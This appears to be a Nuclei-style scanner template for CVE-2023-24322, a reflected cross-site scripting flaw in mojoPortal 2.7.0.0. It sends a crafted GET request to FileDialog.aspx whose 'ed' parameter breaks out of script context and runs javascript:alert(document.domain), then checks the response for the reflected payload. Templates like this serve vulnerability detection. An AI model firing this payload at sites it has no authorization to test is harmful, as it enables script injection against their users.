38 lines
1.1 KiB
YAML
38 lines
1.1 KiB
YAML
|
id: CVE-2023-24322
|
||
|
|
||
|
info:
|
||
|
name: mojoPortal - Cross-Site Scripting
|
||
|
author: pikpikcu
|
||
|
severity: medium
|
||
|
description: A reflected cross-site scripting (XSS) vulnerability in the FileDialog.aspx component of mojoPortal v2.7.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the ed and tbi parameters.
|
||
|
reference:
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-24322
|
||
|
- https://github.com/blakduk/Advisories/blob/main/Mojoportal/README.md
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||
|
cvss-score: 6.1
|
||
|
cwe-id: CWE-79
|
||
|
tags: cves,cve2023,mojoportal,xss
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/Dialog/FileDialog.aspx?ed=foooooooooooooo%27);});});javascript:alert(document.domain);//g"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- 'javascript:alert(document.domain)'
|
||
|
condition: and
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
|
||
|
- type: word
|
||
|
part: header
|
||
|
words:
|
||
|
- "text/html"
|